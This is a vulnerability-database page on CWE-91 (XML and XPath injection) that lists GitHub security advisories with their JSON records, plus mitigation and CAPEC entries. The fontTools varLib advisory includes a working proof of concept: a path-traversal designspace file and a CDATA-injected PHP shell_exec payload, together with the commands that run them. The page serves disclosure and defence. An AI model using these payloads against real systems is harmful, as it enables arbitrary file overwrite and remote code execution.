CWE-91
Allowed-with-ReviewXML Injection (aka Blind XPath Injection)
Abstraction: Base · Status: Draft
The product does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.
190 vulnerabilities reference this CWE, most recent first.
GHSA-768J-98CG-P3FV
Vulnerability from github – Published: 2025-12-01 19:07 – Updated: 2025-12-01 19:07Summary
The fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main().
The vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting /etc/passwd).
Overall this allows attackers to: - Write font files to arbitrary locations on the filesystem - Overwrite configuration files - Corrupt application files and dependencies - Obtain remote code execution
The attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means.
Affected Lines
fontTools/varLib/__init__.py
filename = vf.filename # Unsanitised filename
output_path = os.path.join(output_dir, filename) # Path traversal
vf.save(output_path) # Arbitrary file write
PoC
- Set up
malicious.designspaceand respectivesource-*.ttffiles in a directory like/Users/<username>/testing/demo/(will impact relative file location within malicious.designspace)
setup.py
#!/usr/bin/env python3
import os
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
def create_source_font(filename, weight=400):
fb = FontBuilder(unitsPerEm=1000, isTTF=True)
fb.setupGlyphOrder([".notdef"])
fb.setupCharacterMap({})
pen = TTGlyphPen(None)
pen.moveTo((0, 0))
pen.lineTo((500, 0))
pen.lineTo((500, 500))
pen.lineTo((0, 500))
pen.closePath()
fb.setupGlyf({".notdef": pen.glyph()})
fb.setupHorizontalMetrics({".notdef": (500, 0)})
fb.setupHorizontalHeader(ascent=800, descent=-200)
fb.setupOS2(usWeightClass=weight)
fb.setupPost()
fb.setupNameTable({"familyName": "Test", "styleName": f"Weight{weight}"})
fb.save(filename)
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.abspath(__file__)))
create_source_font("source-light.ttf", weight=100)
create_source_font("source-regular.ttf", weight=400)
malicious.designspace
<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
<axes>
<axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
</axes>
<sources>
<source filename="source-light.ttf" name="Light">
<location>
<dimension name="Weight" xvalue="100"/>
</location>
</source>
<source filename="source-regular.ttf" name="Regular">
<location>
<dimension name="Weight" xvalue="400"/>
</location>
</source>
</sources>
<!-- Filename can be arbitrarily set to any path on the filesystem -->
<variable-fonts>
<variable-font name="MaliciousFont" filename="../../tmp/newarbitraryfile.json">
<axis-subsets>
<axis-subset name="Weight"/>
</axis-subsets>
</variable-font>
</variable-fonts>
</designspace>
Optional: You can put a file with any material within ../../tmp/newarbitraryfile.json in advance, the contents in the file will be overwritten after running the setup script in the following step.
- Run the setup.py script to generate
source-*.tfffiles required for the malicious.designspace file.
python3 setup.py
- Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename
fonttools varLib malicious.designspace
- Validate arbitrary file write was performed by looking at path assigned within malicious designspace
cat {{filename_location}}
- After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload.
malicious2.designspace
<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
<axes>
<!-- XML injection occurs in labelname elements with CDATA sections -->
<axis tag="wght" name="Weight" minimum="100" maximum="900" default="400">
<labelname xml:lang="en"><![CDATA[<?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]]]><![CDATA[>]]></labelname>
<labelname xml:lang="fr">MEOW2</labelname>
</axis>
</axes>
<axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
<sources>
<source filename="source-light.ttf" name="Light">
<location>
<dimension name="Weight" xvalue="100"/>
</location>
</source>
<source filename="source-regular.ttf" name="Regular">
<location>
<dimension name="Weight" xvalue="400"/>
</location>
</source>
</sources>
<variable-fonts>
<variable-font name="MyFont" filename="output.ttf">
<axis-subsets>
<axis-subset name="Weight"/>
</axis-subsets>
</variable-font>
</variable-fonts>
<instances>
<instance name="Display Thin" familyname="MyFont" stylename="Thin">
<location><dimension name="Weight" xvalue="100"/></location>
<labelname xml:lang="en">Display Thin</labelname>
</instance>
</instances>
</designspace>
- When the program is run, we can show we control the contents in the new file
fonttools varLib malicious2.designspace -o file123
Here being outputted to a localised area ignoring filename presented in variable-font
- We can look inside file123 to validate user controlled injection
cat file123
to show <?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]>
- Executing the file and reading looking at the newly generated file
php file123
ls -la /tmp/MEOW123
we can see that the file was just created showing RCE.
Recommendations
- Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "fonttools"
},
"ranges": [
{
"events": [
{
"introduced": "4.33.0"
},
{
"fixed": "4.60.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66034"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-01T19:07:00Z",
"nvd_published_at": "2025-11-29T01:16:02Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `fonttools varLib` (or `python3 -m fontTools.varLib`) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the `main()` code path of `fontTools.varLib`, used by the fonttools varLib CLI and any code that invokes `fontTools.varLib.main()`.\n\nThe vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting `/etc/passwd`).\n\nOverall this allows attackers to:\n- Write font files to arbitrary locations on the filesystem\n- Overwrite configuration files\n- Corrupt application files and dependencies\n- Obtain remote code execution\n\nThe attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means.\n\n## Affected Lines\n\n`fontTools/varLib/__init__.py`\n```python\nfilename = vf.filename # Unsanitised filename\noutput_path = os.path.join(output_dir, filename) # Path traversal\nvf.save(output_path) # Arbitrary file write\n```\n\n## PoC\n1. Set up `malicious.designspace` and respective `source-*.ttf` files in a directory like `/Users/\u003cusername\u003e/testing/demo/` (will impact relative file location within malicious.designspace)\n\n`setup.py`\n```python\n#!/usr/bin/env python3\nimport os\n\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.pens.ttGlyphPen import TTGlyphPen\n\ndef create_source_font(filename, weight=400):\n fb = FontBuilder(unitsPerEm=1000, isTTF=True)\n fb.setupGlyphOrder([\".notdef\"])\n fb.setupCharacterMap({})\n \n pen = TTGlyphPen(None)\n pen.moveTo((0, 0))\n pen.lineTo((500, 0))\n pen.lineTo((500, 500))\n pen.lineTo((0, 500))\n pen.closePath()\n \n fb.setupGlyf({\".notdef\": pen.glyph()})\n fb.setupHorizontalMetrics({\".notdef\": (500, 0)})\n fb.setupHorizontalHeader(ascent=800, descent=-200)\n fb.setupOS2(usWeightClass=weight)\n fb.setupPost()\n fb.setupNameTable({\"familyName\": \"Test\", \"styleName\": f\"Weight{weight}\"})\n fb.save(filename)\n\nif __name__ == \u0027__main__\u0027:\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n create_source_font(\"source-light.ttf\", weight=100)\n create_source_font(\"source-regular.ttf\", weight=400)\n```\n\n`malicious.designspace`\n```xml\n\u003c?xml version=\u00271.0\u0027 encoding=\u0027UTF-8\u0027?\u003e\n\u003cdesignspace format=\"5.0\"\u003e\n \u003caxes\u003e\n \u003caxis tag=\"wght\" name=\"Weight\" minimum=\"100\" maximum=\"900\" default=\"400\"/\u003e\n \u003c/axes\u003e\n \n \u003csources\u003e\n \u003csource filename=\"source-light.ttf\" name=\"Light\"\u003e\n \u003clocation\u003e\n \u003cdimension name=\"Weight\" xvalue=\"100\"/\u003e\n \u003c/location\u003e\n \u003c/source\u003e\n \u003csource filename=\"source-regular.ttf\" name=\"Regular\"\u003e\n \u003clocation\u003e\n \u003cdimension name=\"Weight\" xvalue=\"400\"/\u003e\n \u003c/location\u003e\n \u003c/source\u003e\n \u003c/sources\u003e\n \n \u003c!-- Filename can be arbitrarily set to any path on the filesystem --\u003e\n \u003cvariable-fonts\u003e\n \u003cvariable-font name=\"MaliciousFont\" filename=\"../../tmp/newarbitraryfile.json\"\u003e\n \u003caxis-subsets\u003e\n \u003caxis-subset name=\"Weight\"/\u003e\n \u003c/axis-subsets\u003e\n \u003c/variable-font\u003e\n \u003c/variable-fonts\u003e\n\u003c/designspace\u003e\n```\n\nOptional: You can put a file with any material within `../../tmp/newarbitraryfile.json` in advance, the contents in the file will be overwritten after running the setup script in the following step.\n\n2. Run the setup.py script to generate `source-*.tff` files required for the malicious.designspace file.\n```bash\npython3 setup.py\n```\n3. Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename\n```bash\nfonttools varLib malicious.designspace\n```\n4. Validate arbitrary file write was performed by looking at path assigned within malicious designspace\n```bash\ncat {{filename_location}}\n```\n5. After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload.\n\n`malicious2.designspace`\n```xml\n\u003c?xml version=\u00271.0\u0027 encoding=\u0027UTF-8\u0027?\u003e\n\u003cdesignspace format=\"5.0\"\u003e\n\t\u003caxes\u003e\n \u003c!-- XML injection occurs in labelname elements with CDATA sections --\u003e\n\t \u003caxis tag=\"wght\" name=\"Weight\" minimum=\"100\" maximum=\"900\" default=\"400\"\u003e\n\t \u003clabelname xml:lang=\"en\"\u003e\u003c![CDATA[\u003c?php echo shell_exec(\"/usr/bin/touch /tmp/MEOW123\");?\u003e]]]]\u003e\u003c![CDATA[\u003e]]\u003e\u003c/labelname\u003e\n\t \u003clabelname xml:lang=\"fr\"\u003eMEOW2\u003c/labelname\u003e\n\t \u003c/axis\u003e\n\t\u003c/axes\u003e\n\t\u003caxis tag=\"wght\" name=\"Weight\" minimum=\"100\" maximum=\"900\" default=\"400\"/\u003e\n\t\u003csources\u003e\n\t\t\u003csource filename=\"source-light.ttf\" name=\"Light\"\u003e\n\t\t\t\u003clocation\u003e\n\t\t\t\t\u003cdimension name=\"Weight\" xvalue=\"100\"/\u003e\n\t\t\t\u003c/location\u003e\n\t\t\u003c/source\u003e\n\t\t\u003csource filename=\"source-regular.ttf\" name=\"Regular\"\u003e\n\t\t\t\u003clocation\u003e\n\t\t\t\t\u003cdimension name=\"Weight\" xvalue=\"400\"/\u003e\n\t\t\t\u003c/location\u003e\n\t\t\u003c/source\u003e\n\t\u003c/sources\u003e\n\t\u003cvariable-fonts\u003e\n\t\t\u003cvariable-font name=\"MyFont\" filename=\"output.ttf\"\u003e\n\t\t\t\u003caxis-subsets\u003e\n\t\t\t\t\u003caxis-subset name=\"Weight\"/\u003e\n\t\t\t\u003c/axis-subsets\u003e\n\t\t\u003c/variable-font\u003e\n\t\u003c/variable-fonts\u003e\n\t\u003cinstances\u003e\n\t\t\u003cinstance name=\"Display Thin\" familyname=\"MyFont\" stylename=\"Thin\"\u003e\n\t\t\t\u003clocation\u003e\u003cdimension name=\"Weight\" xvalue=\"100\"/\u003e\u003c/location\u003e\n\t\t\t\u003clabelname xml:lang=\"en\"\u003eDisplay Thin\u003c/labelname\u003e\n\t\t\u003c/instance\u003e\n\t\u003c/instances\u003e\n\u003c/designspace\u003e\n```\n\n6. When the program is run, we can show we control the contents in the new file\n```bash\nfonttools varLib malicious2.designspace -o file123\n```\nHere being outputted to a localised area ignoring filename presented in variable-font\n\n7. We can look inside file123 to validate user controlled injection\n```bash\ncat file123\n```\nto show `\u003c?php echo shell_exec(\"/usr/bin/touch /tmp/MEOW123\");?\u003e]]\u003e`\n\n8. Executing the file and reading looking at the newly generated file\n```bash\nphp file123\nls -la /tmp/MEOW123\n```\nwe can see that the file was just created showing RCE.\n\n## Recommendations\n\n- Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system",
"id": "GHSA-768j-98cg-p3fv",
"modified": "2025-12-01T19:07:00Z",
"published": "2025-12-01T19:07:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66034"
},
{
"type": "WEB",
"url": "https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32"
},
{
"type": "PACKAGE",
"url": "https://github.com/fonttools/fonttools"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "fontTools is Vulnerable to Arbitrary File Write and XML injection in fontTools.varLib"
}
GHSA-77C6-MCHV-4786
Vulnerability from github – Published: 2022-05-14 01:21 – Updated: 2022-05-14 01:21SAP BusinessObjects Business Intelligence Platform (CMC Module), versions 4.10, 4.20 and 4.30, does not sufficiently validate an XML document accepted from an untrusted source.
{
"affected": [],
"aliases": [
"CVE-2019-0268"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-03-12T22:29:00Z",
"severity": "HIGH"
},
"details": "SAP BusinessObjects Business Intelligence Platform (CMC Module), versions 4.10, 4.20 and 4.30, does not sufficiently validate an XML document accepted from an untrusted source.",
"id": "GHSA-77c6-mchv-4786",
"modified": "2022-05-14T01:21:37Z",
"published": "2022-05-14T01:21:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0268"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/2689259"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=515408080"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107364"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-79RJ-564V-63CR
Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2022-05-24 17:48An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_decode() performs incorrect memory handling while parsing crafted XML files, leading to a heap-based buffer overflow.
{
"affected": [],
"aliases": [
"CVE-2021-31598"
],
"database_specific": {
"cwe_ids": [
"CWE-787",
"CWE-91"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-24T17:15:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_decode() performs incorrect memory handling while parsing crafted XML files, leading to a heap-based buffer overflow.",
"id": "GHSA-79rj-564v-63cr",
"modified": "2022-05-24T17:48:44Z",
"published": "2022-05-24T17:48:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31598"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00005.html"
},
{
"type": "WEB",
"url": "https://sourceforge.net/p/ezxml/bugs/28"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7G82-F9RV-R497
Vulnerability from github – Published: 2025-10-08 15:32 – Updated: 2025-10-08 18:30An XML External Entity (XXE) vulnerability in the /mall/wxpay/pay component of uzy-ssm-mall v1.1.0 allows attackers to execute arbitrary code via supplying crafted XML data.
{
"affected": [],
"aliases": [
"CVE-2025-60833"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-08T14:15:46Z",
"severity": "MODERATE"
},
"details": "An XML External Entity (XXE) vulnerability in the /mall/wxpay/pay component of uzy-ssm-mall v1.1.0 allows attackers to execute arbitrary code via supplying crafted XML data.",
"id": "GHSA-7g82-f9rv-r497",
"modified": "2025-10-08T18:30:15Z",
"published": "2025-10-08T15:32:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60833"
},
{
"type": "WEB",
"url": "https://gist.github.com/ChangeYourWay/1364b9e78490ebd5cd31bcdc105a914f"
},
{
"type": "WEB",
"url": "https://github.com/ChangeYourWay/post/blob/main/uzy-ssm-mall.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7JH8-C237-CVQ4
Vulnerability from github – Published: 2022-05-24 17:05 – Updated: 2024-04-04 02:45XMLBlueprint through 16.191112 is affected by XML External Entity Injection. The impact is: Arbitrary File Read when an XML File is validated. The component is: XML Validate function. The attack vector is: Specially crafted XML payload.
{
"affected": [],
"aliases": [
"CVE-2019-19032"
],
"database_specific": {
"cwe_ids": [
"CWE-611",
"CWE-91"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-12-30T20:15:00Z",
"severity": "HIGH"
},
"details": "XMLBlueprint through 16.191112 is affected by XML External Entity Injection. The impact is: Arbitrary File Read when an XML File is validated. The component is: XML Validate function. The attack vector is: Specially crafted XML payload.",
"id": "GHSA-7jh8-c237-cvq4",
"modified": "2024-04-04T02:45:55Z",
"published": "2022-05-24T17:05:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19032"
},
{
"type": "WEB",
"url": "https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/156139/XMLBlueprint-16.191112-XML-Injection.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7Q9G-VFG2-2R6C
Vulnerability from github – Published: 2022-05-17 00:47 – Updated: 2022-05-17 00:47The Googlemaps plugin before 3.1 for Joomla! allows remote attackers to conduct XML injection attacks via the url parameter to plugin_googlemap2_proxy.php.
{
"affected": [],
"aliases": [
"CVE-2013-7429"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-09-14T16:29:00Z",
"severity": "CRITICAL"
},
"details": "The Googlemaps plugin before 3.1 for Joomla! allows remote attackers to conduct XML injection attacks via the url parameter to plugin_googlemap2_proxy.php.",
"id": "GHSA-7q9g-vfg2-2r6c",
"modified": "2022-05-17T00:47:39Z",
"published": "2022-05-17T00:47:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7429"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2013/Jul/158"
},
{
"type": "WEB",
"url": "http://www.mapsplugin.com/Google-Maps/Documentation-of-plugin-Googlemap/security-release-3-1-of-plugin-googlemaps.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2015/02/26/11"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2015/02/26/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7VX2-5349-QJ99
Vulnerability from github – Published: 2022-12-06 00:30 – Updated: 2023-06-06 18:32Withdrawn
This advisory has been withdrawn because it has been found not to be a security issue and withdrawn by its CNA. Please see the message from NVD here for more information. This link is maintained to preserve external references.
Original Description
ConcreteCMS v9.1.3 was discovered to be vulnerable to Xpath injection attacks. This vulnerability allows attackers to access sensitive XML data via a crafted payload injected into the URL path folder "3".
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "concrete5/concrete5"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "9.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-46464"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": true,
"github_reviewed_at": "2022-12-06T15:35:16Z",
"nvd_published_at": "2022-12-05T23:15:00Z",
"severity": "HIGH"
},
"details": "## Withdrawn\nThis advisory has been withdrawn because it has been found not to be a security issue and withdrawn by its CNA. Please see the message from NVD [here](https://nvd.nist.gov/vuln/detail/CVE-2022-46464) for more information. This link is maintained to preserve external references.\n\n## Original Description \n\nConcreteCMS v9.1.3 was discovered to be vulnerable to Xpath injection attacks. This vulnerability allows attackers to access sensitive XML data via a crafted payload injected into the URL path folder \"3\".",
"id": "GHSA-7vx2-5349-qj99",
"modified": "2023-06-06T18:32:24Z",
"published": "2022-12-06T00:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46464"
},
{
"type": "PACKAGE",
"url": "https://github.com/concretecms/concretecms"
},
{
"type": "WEB",
"url": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Withdrawn: ConcreteCMS vulnerable to Xpath injection attacks",
"withdrawn": "2023-06-06T18:32:24Z"
}
GHSA-8354-72XF-4743
Vulnerability from github – Published: 2022-05-24 21:59 – Updated: 2023-01-20 18:30An issue was discovered in Open Ticket Request System (OTRS) 5.x through 5.0.34, 6.x through 6.0.17, and 7.x through 7.0.6. An attacker who is logged into OTRS as an agent user with appropriate permissions may try to import carefully crafted Report Statistics XML that will result in reading of arbitrary files on the OTRS filesystem.
{
"affected": [],
"aliases": [
"CVE-2019-9892"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-05-22T00:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Open Ticket Request System (OTRS) 5.x through 5.0.34, 6.x through 6.0.17, and 7.x through 7.0.6. An attacker who is logged into OTRS as an agent user with appropriate permissions may try to import carefully crafted Report Statistics XML that will result in reading of arbitrary files on the OTRS filesystem.",
"id": "GHSA-8354-72xf-4743",
"modified": "2023-01-20T18:30:23Z",
"published": "2022-05-24T21:59:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9892"
},
{
"type": "WEB",
"url": "https://community.otrs.com/security-advisory-2019-04-security-update-for-otrs-framework"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00003.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00038.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00066.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00077.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-859W-5CJ3-3PH9
Vulnerability from github – Published: 2022-10-18 12:00 – Updated: 2022-10-18 12:00An XPath Injection vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker sending a crafted POST to reach the XPath channel, which may allow chaining to other unspecified vulnerabilities, leading to a partial loss of confidentiality. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2.
{
"affected": [],
"aliases": [
"CVE-2022-22244"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-18T03:15:00Z",
"severity": "MODERATE"
},
"details": "An XPath Injection vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker sending a crafted POST to reach the XPath channel, which may allow chaining to other unspecified vulnerabilities, leading to a partial loss of confidentiality. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2.",
"id": "GHSA-859w-5cj3-3ph9",
"modified": "2022-10-18T12:00:30Z",
"published": "2022-10-18T12:00:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22244"
},
{
"type": "WEB",
"url": "https://kb.juniper.net/JSA69899"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8JJF-W7J6-323C
Vulnerability from github – Published: 2018-01-04 21:03 – Updated: 2023-08-18 21:00Versions of samlify prior to 2.4.0-rc5 are vulnerable to Authentication Bypass. The package fails to prevent XML Signature Wrapping, allowing tokens to be reused with different usernames. A remote attacker can modify SAML content for a SAML service provider without invalidating the cryptographic signature, which may allow attackers to bypass primary authentication for the affected SAML service provider.
Recommendation
Upgrade to version 2.4.0-rc5 or later
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "samlify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.4.0-rc5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-1000452"
],
"database_specific": {
"cwe_ids": [
"CWE-347",
"CWE-91"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:25:47Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Versions of `samlify` prior to 2.4.0-rc5 are vulnerable to Authentication Bypass. The package fails to prevent XML Signature Wrapping, allowing tokens to be reused with different usernames. A remote attacker can modify SAML content for a SAML service provider without invalidating the cryptographic signature, which may allow attackers to bypass primary authentication for the affected SAML service provider.\n\n\n## Recommendation\n\nUpgrade to version 2.4.0-rc5 or later",
"id": "GHSA-8jjf-w7j6-323c",
"modified": "2023-08-18T21:00:53Z",
"published": "2018-01-04T21:03:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000452"
},
{
"type": "WEB",
"url": "https://github.com/tngan/samlify/commit/d382bbc7c6b8ea889839ae1f178730c25b09eb42"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/356284"
},
{
"type": "PACKAGE",
"url": "https://github.com/tngan/samlify"
},
{
"type": "WEB",
"url": "https://github.com/tngan/samlify/compare/v2.4.0-rc4...v2.4.0-rc5"
},
{
"type": "WEB",
"url": "https://github.com/tngan/samlify/releases/tag/v2.4.0-rc5"
},
{
"type": "WEB",
"url": "https://www.whitehats.nl/blog/xml-signature-wrapping-samlify"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Samlify vulnerable to Authentication Bypass by allowing tokens to be reused with different usernames"
}
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
CAPEC-250: XML Injection
An attacker utilizes crafted XML user-controllable input to probe, attack, and inject data into the XML database, using techniques similar to SQL injection. The user-controllable input can allow for unauthorized viewing of data, bypassing authentication or the front-end application for direct XML database access, and possibly altering database information.
CAPEC-83: XPath Injection
An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.